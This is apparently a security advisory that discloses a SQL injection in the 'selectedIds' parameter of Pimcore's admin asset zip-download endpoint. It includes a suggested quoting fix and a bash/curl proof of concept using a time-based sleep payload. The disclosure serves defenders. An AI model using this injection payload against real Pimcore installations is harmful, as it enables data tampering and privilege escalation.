GHSA-cwx6-4wmf-c6xv

### Summary
The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.

### Details
[downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not.
The following code should be added:
```
foreach ($selectedIds as $selectedId) {
if ($selectedId) {
$quotedSelectedIds[] = $db->quote($selectedId);
}
}
```

### PoC

- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)
- Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie.
- Run the following script, substituting the values accordingly:
```
#!/bin/bash
BASE_URL=http://localhost # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"

curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
-X GET \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" `
```
- The response is delayed by 6 seconds.

### Impact
Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.